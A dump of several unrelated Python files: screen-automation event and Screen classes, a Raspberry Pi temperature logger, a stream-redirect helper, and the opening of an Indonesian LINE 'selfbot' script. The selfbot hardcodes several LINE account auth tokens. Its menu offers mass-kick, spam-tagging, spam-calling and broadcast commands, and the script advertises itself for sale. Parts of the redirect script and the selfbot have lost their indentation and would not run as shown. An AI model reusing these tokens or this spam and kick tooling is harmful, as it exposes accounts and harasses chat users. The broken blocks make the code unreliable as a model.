                # while VANISH/CHANGE below queue only when no handler exists --
                # confirm this asymmetry is intended.
                self.caught_events.append(appear_event)
                event["count"] += 1
                # Event handlers are inactivated after being caught once
                event["active"] = False
            elif event_type == "VANISH" and not self._region.exists(event["pattern"], 0):
                # Call the handler with a new ObserveEvent object
                vanish_event = ObserveEvent(self._region,
                                            count=event["count"],
                                            pattern=event["pattern"],
                                            event_type=event["event_type"])
                if callable(handler):
                    handler(vanish_event)
                else:
                    self.caught_events.append(vanish_event)
                event["count"] += 1
                # Event handlers are inactivated after being caught once
                event["active"] = False
            # For a CHANGE event, ``pattern`` is a tuple of
            # (min_pixels_changed, original_region_state)
            elif event_type == "CHANGE" and self._region.isChanged(*event["pattern"]):
                # Call the handler with a new ObserveEvent object
                change_event = ObserveEvent(self._region,
                                            count=event["count"],
                                            pattern=event["pattern"],
                                            event_type=event["event_type"])
                if callable(handler):
                    handler(change_event)
                else:
                    self.caught_events.append(change_event)
                event["count"] += 1
                # Event handlers are inactivated after being caught once
                event["active"] = False
class ObserveEvent(object):
    """ Describes a single observer occurrence (appear/vanish/change/etc.)
    together with the region, pattern, and match data that produced it. """

    def __init__(self, region=None, count=0, pattern=None, match=None, event_type="GENERIC"):
        self._valid_types = ["APPEAR", "VANISH", "CHANGE", "GENERIC", "FINDFAILED", "MISSING"]
        self._type = event_type
        self._region = region
        self._pattern = pattern
        self._match = match
        self._count = count

    def _checkType(self, method_name, valid_types):
        # Shared guard: some accessors only make sense for certain event kinds.
        if self._type not in valid_types:
            raise TypeError("This is a(n) {} event, but method {} is only valid for the following event types: ({})".format(self._type, method_name, ", ".join(valid_types)))

    def getType(self):
        return self._type

    def isAppear(self):
        return self._type == "APPEAR"

    def isVanish(self):
        return self._type == "VANISH"

    def isChange(self):
        return self._type == "CHANGE"

    def isGeneric(self):
        return self._type == "GENERIC"

    def isFindFailed(self):
        return self._type == "FINDFAILED"

    def isMissing(self):
        return self._type == "MISSING"

    def getRegion(self):
        return self._region

    def getPattern(self):
        return self._pattern

    def getImage(self):
        """ Load and return the pattern's image file (pattern-based events only). """
        self._checkType("getImage", ["APPEAR", "VANISH", "FINDFAILED", "MISSING"])
        if self._pattern is None:
            raise ValueError("This event's pattern was not set!")
        return cv2.imread(self._pattern.path)

    def getMatch(self):
        """ Return the match for an APPEAR/VANISH event. """
        self._checkType("getMatch", ["APPEAR", "VANISH"])
        if self._match is None:
            raise ValueError("This event's match was not set!")
        return self._match

    def getChanges(self):
        """ Return the change data for a CHANGE event. """
        self._checkType("getChanges", ["CHANGE"])
        if self._match is None:
            raise ValueError("This event's match was not set!")
        return self._match

    def getCount(self):
        return self._count
class FindFailedEvent(ObserveEvent):
    """ Event raised when a find operation fails.

    Carries an optional response (ABORT/SKIP/PROMPT/RETRY) chosen by a custom
    handler via setResponse().
    """
    def __init__(self, *args, **kwargs):
        ObserveEvent.__init__(self, *args, **kwargs)
        self._response = None

    def setResponse(self, response):
        """ Record how the failed find should be resolved.

        Fix: ``self`` was missing from the signature, so any instance call
        like ``event.setResponse("RETRY")`` validated the event object itself
        (always raising ValueError) and ``self._response`` was unresolvable.
        """
        valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
        if response not in valid_responses:
            raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
        else:
            self._response = response

    def __repr__(self):
        if hasattr(self._pattern, "path"):
            return self._pattern.path
        return self._pattern
class ImageMissingEvent(ObserveEvent):
    """ Event raised when a pattern's image file cannot be found.

    Carries an optional response (ABORT/SKIP/RETRY) chosen by a custom
    handler via setResponse().
    """
    def __init__(self, *args, **kwargs):
        ObserveEvent.__init__(self, *args, **kwargs)
        self._response = None

    def setResponse(self, response):
        """ Record how the missing image should be resolved.

        Fix: ``self`` was missing from the signature (same bug as
        FindFailedEvent.setResponse), making the method uncallable on an
        instance.
        """
        valid_responses = ("ABORT", "SKIP", "RETRY")
        if response not in valid_responses:
            raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
        else:
            self._response = response

    def __repr__(self):
        if hasattr(self._pattern, "path"):
            return self._pattern.path
        return self._pattern
class Match(Region):
    """ Extended Region object with additional data on click target, match score """
    def __init__(self, score, target, rect):
        # rect is ((x, y), (w, h)) as produced by the finder.
        super(Match, self).__init__(rect[0][0], rect[0][1], rect[1][0], rect[1][1])
        self._score = float(score)
        if not target or not isinstance(target, Location):
            raise TypeError("Match expected target to be a Location object")
        self._target = target

    def getScore(self):
        """ Returns confidence score of the match """
        return self._score

    def getTarget(self):
        """ Returns the location of the match click target (center by default, but may be offset) """
        return self.getCenter().offset(self._target.x, self._target.y)

    def __repr__(self):
        # Fix: the format spec was "{:2f}" (field *width* 2 with default
        # 6-digit precision); "{:.2f}" prints the intended two decimals.
        return "Match[{},{} {}x{}] score={:.2f}, target={}".format(self.x, self.y, self.w, self.h, self._score, self._target.getTuple())
class Screen(Region):
    """ Individual screen objects can be created for each monitor in a multi-monitor system.

    Screens are indexed according to the system order. 0 is the primary monitor (display 1),
    1 is the next monitor, etc.

    Lackey also makes it possible to search all screens as a single "virtual screen," arranged
    according to the system's settings. Screen(-1) returns this virtual screen. Note that the
    larger your search region is, the slower your search will be, so it's best practice to adjust
    your region to the particular area of the screen where you know your target will be.

    Note that Sikuli is inconsistent in identifying screens. In Windows, Sikuli identifies the
    first hardware monitor as Screen(0) rather than the actual primary monitor. However, on OS X
    it follows the latter convention. We've opted to make Screen(0) the actual primary monitor
    (wherever the Start Menu/System Menu Bar is) across the board.
    """
    primaryScreen = 0

    def __init__(self, screenId=None):
        """ Defaults to the main screen. """
        # Fall back to the primary display when the id is missing or out of range.
        if not isinstance(screenId, int) or screenId < -1 or screenId >= len(PlatformManager.getScreenDetails()):
            screenId = Screen.getPrimaryID()
        self._screenId = screenId
        x, y, w, h = self.getBounds()
        self.lastScreenImage = None
        super(Screen, self).__init__(x, y, w, h)

    @classmethod
    def getNumberScreens(cls):
        """ Get the number of screens in a multi-monitor environment at the time the script is running """
        return len(PlatformManager.getScreenDetails())

    def getBounds(self):
        """ Returns bounds of screen as (x, y, w, h) """
        return PlatformManager.getScreenBounds(self._screenId)

    def capture(self, *args): #x=None, y=None, w=None, h=None):
        """ Captures the region as an image """
        if len(args) == 0:
            # Capture screen region
            region = self
        elif isinstance(args[0], Region):
            # Capture specified region
            region = args[0]
        elif isinstance(args[0], tuple):
            # Capture region defined by specified tuple
            region = Region(*args[0])
        elif isinstance(args[0], basestring):
            # Interactive mode
            raise NotImplementedError("Interactive capture mode not defined")
        elif isinstance(args[0], int):
            # Capture region defined by provided x,y,w,h
            region = Region(*args)
        else:
            # Fix: unsupported argument types previously fell through and hit an
            # UnboundLocalError on ``region``; fail fast with a clear message.
            raise TypeError("capture() does not support arguments of type {}".format(type(args[0]).__name__))
        self.lastScreenImage = region.getBitmap()
        return self.lastScreenImage
    captureForHighlight = capture

    def selectRegion(self, text=""):
        """ Not yet implemented """
        raise NotImplementedError()

    def doPrompt(self, message, obs):
        """ Not yet implemented """
        raise NotImplementedError()

    def closePrompt(self):
        """ Not yet implemented """
        raise NotImplementedError()

    def resetPrompt(self):
        """ Not yet implemented """
        raise NotImplementedError()

    def hasPrompt(self):
        """ Not yet implemented """
        raise NotImplementedError()

    def userCapture(self, message=""):
        """ Not yet implemented """
        raise NotImplementedError()

    def saveCapture(self, name, reg=None):
        """ Not yet implemented """
        raise NotImplementedError()

    def getCurrentID(self):
        """ Returns screen ID """
        return self._screenId
    getID = getCurrentID

    @classmethod
    def getPrimaryID(cls):
        """ Returns primary screen ID """
        return cls.primaryScreen

    @classmethod
    def getPrimaryScreen(cls):
        """ Returns the primary screen """
        return Screen(cls.primaryScreen)

    @classmethod
    def showMonitors(cls):
        """ Prints debug information about currently detected screens """
        Debug.info("*** monitor configuration [ {} Screen(s)] ***".format(cls.getNumberScreens()))
        Debug.info("*** Primary is Screen {}".format(cls.primaryScreen))
        for index, screen in enumerate(PlatformManager.getScreenDetails()):
            Debug.info("Screen {}: ({}, {}, {}, {})".format(index, *screen["rect"]))
        Debug.info("*** end monitor configuration ***")

    def resetMonitors(self):
        """ Recalculates screen based on changed monitor setup """
        Debug.error("*** BE AWARE: experimental - might not work ***")
        Debug.error("Re-evaluation of the monitor setup has been requested")
        Debug.error("... Current Region/Screen objects might not be valid any longer")
        Debug.error("... Use existing Region/Screen objects only if you know what you are doing!")
        self.__init__(self._screenId)
        self.showMonitors()

    def newRegion(self, loc, width, height):
        """ Creates a new region on the current screen at the specified offset with the specified
        width and height. """
        return Region.create(self.getTopLeft().offset(loc), width, height)

    def getLastScreenImageFromScreen(self):
        """ Returns the last captured image from this screen """
        return self.lastScreenImage

    def newLocation(self, loc):
        """ Creates a new location on this screen, with the same offset it would have had on the
        default screen """
        return Location(loc).copyTo(self)

    def showTarget(self):
        """ Not yet implemented """
        raise NotImplementedError()
hot_pi_d.py | import sqlite3
import threading
import time
class TemperatureRecorder:
    """Samples the CPU temperature every 10 seconds on a background thread and
    stores readings in a SQLite database, committing at most once a minute."""
    # Class-level defaults; ``record`` rebinds last_temp / last_commit_time on
    # the instance as it runs.
    thread_stop_event = threading.Event()
    last_temp = 0
    last_commit_time = time.time()

    def start(self):
        """Launch the recording loop on a daemon thread so the interpreter can
        exit even if stop() is never reached."""
        worker = threading.Thread(target=self.record, args=(self.thread_stop_event,))
        worker.daemon = True
        worker.start()

    def stop(self):
        """Signal the recording loop to finish; safe to call more than once."""
        self.thread_stop_event.set()

    def record(self, stop_event, db_path="/opt/hotpi/temperatures.db",
               sensor_path="/sys/class/thermal/thermal_zone0/temp"):
        """Poll the sensor every 10 seconds and insert readings until
        ``stop_event`` is set.

        ``db_path`` and ``sensor_path`` default to the production locations but
        may be overridden (e.g. for testing).
        """
        conn = sqlite3.connect(db_path)
        try:
            while not stop_event.is_set():
                self.last_temp = self.get_curr_temp(sensor_path)
                # Parameterized insert instead of string concatenation.
                conn.execute("INSERT INTO temperatures(temperature) VALUES(?)",
                             (self.last_temp,))
                if time.time() - self.last_commit_time > 60:
                    conn.commit()
                    self.last_commit_time = time.time()
                stop_event.wait(10)
            # Fix: flush pending rows on shutdown; the original closed without
            # committing and silently dropped up to a minute of readings.
            conn.commit()
        finally:
            conn.close()

    def get_curr_temp(self, sensor_path="/sys/class/thermal/thermal_zone0/temp"):
        """Return the current temperature (millidegrees Celsius) from sysfs."""
        with open(sensor_path, "r") as f:
            return int(f.read())
# Module entry point: start the recorder thread and idle until Ctrl-C.
recorder = TemperatureRecorder()
recorder.start()
try:
    while (True):
        time.sleep(1)
except KeyboardInterrupt:
    recorder.stop()
# NOTE(review): this trailing stop() repeats the handler above; stop() only
# sets an Event, so the duplicate call is harmless.
recorder.stop()
redirect_streams.py | import os
import sys
import subprocess
import threading
from .mflog import decorate
# This script runs another process and captures stderr and stdout to a file, decorating
# lines with mflog metadata.
#
# Usage: redirect_streams SOURCE STDOUT_FILE STDERR_FILE PROGRAM ARG1 ARG2 ...
def reader_thread(SOURCE, dest_file, dest_stream, src):
    """Tee one child-process stream: append each line, decorated with mflog
    metadata, to ``dest_file`` while echoing the raw line to ``dest_stream``.

    ``src`` is the child's stdout or stderr pipe (binary mode);
    ``dest_stream`` is the matching parent stream (sys.stdout / sys.stderr).
    """
    with open(dest_file, mode="ab", buffering=0) as f:
        if sys.version_info < (3, 0):
            # Python 2: iterate via readline to avoid the readahead buffer
            # (https://bugs.python.org/issue3907).
            # Fix: the original read from sys.stdin and echoed to a hard-coded
            # sys.stdout, ignoring the ``src`` pipe and ``dest_stream`` it was
            # given -- the stderr reader therefore never saw the child's stderr.
            for line in iter(src.readline, ""):
                f.write(decorate(SOURCE, line))
                dest_stream.write(line)
        else:
            # Python 3: the pipe yields bytes; write through the text stream's
            # underlying binary buffer.
            for line in src:
                f.write(decorate(SOURCE, line))
                dest_stream.buffer.write(line)
if __name__ == "__main__":
SOURCE = sys.argv[1].encode("utf-8")
stdout_dest = sys.argv[2]
stderr_dest = sys.argv[3]
p = subprocess.Popen(
sys.argv[4:],
env=os.environ,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout_reader = threading.Thread(
target=reader_thread, args=(SOURCE, stdout_dest, sys.stdout, p.stdout)
)
stdout_reader.start()
stderr_reader = threading.Thread(
target=reader_thread, args=(SOURCE, stderr_dest, sys.stderr, p.stderr)
)
stderr_reader.start()
rc = p.wait()
stdout_reader.join()
stderr_reader.join()
sys.exit(rc)
|
12.py | # -*- coding: utf-8 -*-
import LINEPY
from LINEPY import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
import youtube_dl
cl = LineClient(authToken='EpKRMvwu9eBKS3IK8ivc.sVCqTiIkfujwHVOznKXlla.ZUoCVYRNMm9czWD9RdSZA64LXi8qV+KBspTn6nIxyPE=')
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
ki = LineClient(authToken='EpVWlpYYD1pYL5yGEJI1.VZq819K+MTjFp7EJL7DGCq.TPURLoZWVJOYtDcPMBnVvCsoPc2NNnhxVQjq45TBQ14=')
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
kk = LineClient(authToken='EpDU06Uy9J24U81UiGO4.fG185DzpN/oBUhOUTcrLfa.ZM9KnvNqWHs/HCfYDWDxTSGVM7e5vCCdl64RKRw9ZZE=')
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
kc = LineClient(authToken='EpBZ26TLJwUQ16hx8af5.JFqPWmGNQCrnZwiG3a94vq.dn3X8CYFlhwkNKYtGGPSIPcaa58J57gFu81UWgl8a5o=')
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
sw = LineClient(authToken='Epb3mJhX70IDASJeqcza.fdZ3mfXjEHiMPpSnvvUW/G.IUmH6xliKXmbV8xVBpsiWvfwcYkIKHuueGeRhVmT8Ps=')
sw.log("Auth Token : " + str(sw.authToken))
channel11 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel11.channelAccessToken))
poll = LinePoll(cl)
call = LineCall(cl)
creator = ["u02aea92a3d7e44f587e7a91141e78b59"]
owner = ["u02aea92a3d7e44f587e7a91141e78b59"]
admin = ["u4af710b4888a15425686fa19364c4b2c"]
staff = ["u4af710b4888a15425686fa19364c4b2c"]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Zmid = sw.getProfile().mid
KAC = [cl,ki,kk,kc]
ABC = [ki,kk,kc]
Bots = [mid,Amid,Bmid,Cmid,Zmid]
Saints = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
welcome = []
responsename1 = ki.getProfile().displayName
responsename2 = kk.getProfile().displayName
responsename3 = kc.getProfile().displayName
settings = {
"Picture":False,
"group":{},
"groupPicture":False,
"changePicture":False,
"autoJoinTicket":False,
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 1,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":False,
"contact":False,
'autoJoin':False,
'autoAdd':True,
'autoCancel':{"on":True, "members":1},
'autoLeave':False,
'autoLeave1':False,
"detectMention":False,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"selfbot":True,
"mention":"Masuk kk jan malu malu suee..😜",
"Respontag":"Jangan sering sering tag tq..😁 ",
"welcome":"Wellcome to my Fams",
"comment":"Auto like By CxB team",
"message":"Thanks add me🙏\n™CxB team™\n\nOpen Order:\n™↔ 1 Sb + 3 assist\n™↔ 1 Sb + 5 assist\n\nMinat?\nCpc bouuusss...",
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def restart_program():
    """Replace the current process with a fresh interpreter running the same
    script and arguments (never returns)."""
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
def restartBot():
    """Re-exec the running bot in place (duplicate of restart_program)."""
    exec_args = [sys.executable, sys.executable] + list(sys.argv)
    os.execl(*exec_args)
def waktu(secs):
    """Format a duration in seconds as 'DD Hari HH Jam MM Menit SS Detik'
    (Indonesian for days/hours/minutes/seconds)."""
    remainder = secs
    parts = []
    # Successively strip seconds, minutes, then hours off the total.
    for unit in (60, 60, 24):
        remainder, value = divmod(remainder, unit)
        parts.append(value)
    seconds, minutes, hours = parts
    days = remainder
    return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, minutes, seconds)
def runtime(secs):
    """Format elapsed seconds as 'DD Hari HH Jam MM Menit SS Detik'
    (behaviorally identical twin of waktu)."""
    total_minutes, seconds = divmod(secs, 60)
    total_hours, minutes = divmod(total_minutes, 60)
    days, hours = divmod(total_hours, 24)
    return '%02d Hari %02d Jam %02d Menit %02d Detik' % (
        days, hours, minutes, seconds)
def mentionMembers(to, mid):
    # Sends a numbered message to chat ``to`` that @-mentions every user id in
    # ``mid``. The S/E offsets in arrData mark where each "@x" placeholder sits
    # inside the text so the LINE client renders it as a tappable mention.
    try:
        arrData = ""
        textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
        arr = []
        no = 1
        num = 2
        for i in mid:
            mention = "@x\n"
            slen = str(len(textx))
            elen = str(len(textx) + len(mention) - 1)
            arrData = {'S':slen, 'E':elen, 'M':i}
            arr.append(arrData)
            textx += mention
            if no < len(mid):
                no += 1
                textx += "%i. " % (num)
                num=(num+1)
            else:
                # NOTE(review): this footer is assigned to ``no`` but never
                # appended to textx -- presumably dead code; confirm.
                try:
                    no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
                except:
                    no = "\n╚══[ Success ]"
        cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
    # Like mentionMembers, but greets lurkers ("siders") with the configured
    # wait["mention"] text after each @-mention placeholder.
    try:
        arrData = ""
        textx = "Total Sider User「{}」\nHaii ".format(str(len(mid)))
        arr = []
        no = 1
        num = 2
        for i in mid:
            mention = "@x\n"
            slen = str(len(textx))
            elen = str(len(textx) + len(mention) - 1)
            arrData = {'S':slen, 'E':elen, 'M':i}
            arr.append(arrData)
            textx += mention+wait["mention"]
            if no < len(mid):
                no += 1
                textx += "%i. " % (num)
                num=(num+1)
            else:
                # NOTE(review): footer assigned to ``no`` but never appended to
                # textx -- appears to be dead code; confirm.
                try:
                    no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
                except:
                    no = "\n╚══[ Success ]"
        cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
    # Greets newly-joined members of group ``to`` with the configured
    # wait["welcome"] text plus the group name, @-mentioning each user id.
    try:
        arrData = ""
        textx = "Total Member Masuk「{}」\nHaii ".format(str(len(mid)))
        arr = []
        no = 1
        num = 2
        for i in mid:
            # NOTE(review): the group is re-fetched on every iteration; it
            # could be fetched once before the loop.
            ginfo = cl.getGroup(to)
            mention = "@x\n"
            slen = str(len(textx))
            elen = str(len(textx) + len(mention) - 1)
            arrData = {'S':slen, 'E':elen, 'M':i}
            arr.append(arrData)
            textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
            if no < len(mid):
                no += 1
                textx += "%i " % (num)
                num=(num+1)
            else:
                # NOTE(review): footer assigned to ``no`` but never appended to
                # textx -- appears to be dead code; confirm.
                try:
                    no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
                except:
                    no = "\n╚══[ Success ]"
        cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
    # Sends ``firstmessage`` to chat ``to`` with a single @-mention of user
    # ``mid``, followed by a status block (time, group/friend counts, uptime).
    try:
        arrData = ""
        text = "%s " %(str(firstmessage))
        arr = []
        mention = "@x \n"
        slen = str(len(text))
        elen = str(len(text) + len(mention) - 1)
        arrData = {'S':slen, 'E':elen, 'M':mid}
        arr.append(arrData)
        # Days remaining until the hard-coded expiry date below.
        today = datetime.today()
        future = datetime(2018,3,1)
        hari = (str(future - today))
        comma = hari.find(",")
        hari = hari[:comma]
        teman = cl.getAllContactIds()
        gid = cl.getGroupIdsJoined()
        tz = pytz.timezone("Asia/Jakarta")
        timeNow = datetime.now(tz=tz)
        # Uptime measured from module start time ``mulai``.
        eltime = time.time() - mulai
        bot = runtime(eltime)
        text += mention+"™↔ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n™↔ Group : "+str(len(gid))+"\n™↔ Teman : "+str(len(teman))+"\n™↔ Expired : In "+hari+"\n™↔ Version : Saints Bot\n™↔ Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n™↔ Runtime : \n • "+bot
        cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
    """Strip the configured command prefix from ``text`` (lower-cased).

    Returns the literal string "command" when the prefix is absent, which no
    dispatcher branch matches.
    """
    lowered = text.lower()
    prefix = Setmain["keyCommand"]
    if not lowered.startswith(prefix):
        return "command"
    # Matches the original behavior: every occurrence of the prefix is removed.
    return lowered.replace(prefix, "")
def help():
    """Build the main selfbot menu text, prefixing each command with the
    currently configured key (title-cased)."""
    key = Setmain["keyCommand"]
    key = key.title()
    helpMessage = "™[ Selfbot Menu ]™\n Gunakan「 " + key + " 」di depannya\n\n" + \
        "™↔ " + key + "Me\n" + \
        "™↔ " + key + "Mid「@」\n" + \
        "™↔ " + key + "Info「@」\n" + \
        "™↔ " + key + "Nk「@」\n" + \
        "™↔ " + key + "Kick1「@」\n" + \
        "™↔ " + key + "Mybot\n" + \
        "™↔ " + key + "Status\n" + \
        "™↔ " + key + "About\n" + \
        "™↔ " + key + "Restart\n" + \
        "™↔ " + key + "Runtime\n" + \
        "™↔ " + key + "Creator\n" + \
        "™↔ " + key + "Speed/Sp\n" + \
        "™↔ " + key + "Sprespon\n" + \
        "™↔ " + key + "Tagall\n" + \
        "™↔ " + key + "Joinall\n" + \
        "™↔ " + key + "Byeall\n" + \
        "™↔ " + key + "Byeme\n" + \
        "™↔ " + key + "Leave「Namagrup」\n" + \
        "™↔ " + key + "Ginfo\n" + \
        "™↔ " + key + "Open\n" + \
        "™↔ " + key + "Close\n" + \
        "™↔ " + key + "Url grup\n" + \
        "™↔ " + key + "Gruplist\n" + \
        "™↔ " + key + "Infogrup「angka」\n" + \
        "™↔ " + key + "Infomem「angka」\n" + \
        "™↔ " + key + "Remove chat\n" + \
        "™↔ " + key + "Lurking「on/off」\n" + \
        "™↔ " + key + "Lurkers\n" + \
        "™↔ " + key + "Sider「on/off」\n" + \
        "™ " + key + "Updatefoto\n" + \
        "™↔ " + key + "Updategrup\n" + \
        "™↔ " + key + "Updatebot\n" + \
        "™↔ " + key + "Broadcast:「Text」\n" + \
        "™↔ " + key + "Setkey「New Key」\n" + \
        "™↔ " + key + "Mykey\n" + \
        "™↔ " + key + "Resetkey\n" + \
        "\n ™[Selfbot Hiburan]™\n Gunakan「 " + key + " 」di depannya\n\n" + \
        "™↔ " + key + "ID line:「Id Line nya」\n" + \
        "™↔ " + key + "Sholat:「Nama Kota」\n" + \
        "™↔ " + key + "Cuaca:「Nama Kota」\n" + \
        "™↔ " + key + "Lokasi:「Nama Kota」\n" + \
        "™↔ " + key + "Music:「Judul Lagu」\n" + \
        "™↔ " + key + "Lirik:「Judul Lagu」\n" + \
        "™↔ " + key + "Ytmp3:「Judul Lagu」\n" + \
        "™↔ " + key + "Ytmp4:「Judul Video」\n" + \
        "™↔ " + key + "Profileig:「Nama IG」\n" + \
        "™↔ " + key + "Cekdate:「tgl-bln-thn」\n" + \
        "™↔ " + key + "Jumlah:「angka」\n" + \
        "™↔ " + key + "Spamtag「@」\n" + \
        "™↔ " + key + "Spamcall:「jumlahnya」\n" + \
        "™↔ " + key + "Spamcall\n" + \
        "\n™[ Selfbot Protection ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n" + \
        "™↔ " + key + "Notag「on/off」\n" + \
        "™↔ " + key + "Semuapro「on/off」\n" + \
        "™↔ " + key + "Protecturl「on/off」\n" + \
        "™↔ " + key + "Protectjoin「on/off」\n" + \
        "™↔ " + key + "Protectkick「on/off」\n" + \
        "™↔ " + key + "Protectcancel「on/off」\n" + \
        "\n™[ Selfbot Settings ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n" + \
        "™↔ " + key + "Sticker「on/off」\n" + \
        "™↔ " + key + "Respon「on/off」\n" + \
        "™↔ " + key + "Contact「on/off」\n" + \
        "™↔ " + key + "Autojoin「on/off」\n" + \
        "™↔ " + key + "Autoadd「on/off」\n" + \
        "™↔ " + key + "Welcome「on/off」\n" + \
        "™↔ " + key + "Autoleave「on/off」\n" + \
        "\n™[ Selfbot Admin ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n" + \
        "™↔ " + key + "Admin:on\n" + \
        "™↔ " + key + "Admin:repeat\n" + \
        "™↔ " + key + "Staff:on\n" + \
        "™↔ " + key + "Staff:repeat\n" + \
        "™↔ " + key + "Bot:on\n" + \
        "™↔ " + key + "Bot:repeat\n" + \
        "™↔ " + key + "Adminadd「@」\n" + \
        "™↔ " + key + "Admindell「@」\n" + \
        "™↔ " + key + "Staffadd「@」\n" + \
        "™↔ " + key + "Staffdell「@」\n" + \
        "™↔ " + key + "Botadd「@」\n" + \
        "™↔ " + key + "Botdell「@」\n" + \
        "™↔ " + key + "Refresh\n" + \
        "™↔ " + key + "Listbot\n" + \
        "™↔ " + key + "Listadmin\n" + \
        "™↔ " + key + "Listprotect\n" + \
        "\nKetik「 Refresh 」Setelah\nmenggunakan command...\n"
    return helpMessage
def helpbot():
    """Return the secondary help text (blacklist + menu commands).

    Reads the currently configured command key from the module-global
    ``Setmain["keyCommand"]``, title-cases it, and prefixes every listed
    command with it. The rendered text is identical to the original
    hand-concatenated message.
    """
    key = Setmain["keyCommand"].title()
    # Commands shown under the "Selfbot Blacklist" header.
    blacklist_cmds = (
        "Blc",
        "Ban:on",
        "Unban:on",
        "Ban「@」",
        "Unban「@」",
        "Talkban「@」",
        "Untalkban「@」",
        "Talkban:on",
        "Untalkban:on",
        "Banlist",
        "Talkbanlist",
        "Clearban",
        "Refresh",
    )
    # Commands shown under the "Selfbot Menu" header.
    # NOTE: "Cek pesan " and "Cek respon " intentionally keep their
    # trailing space to match the original output byte-for-byte.
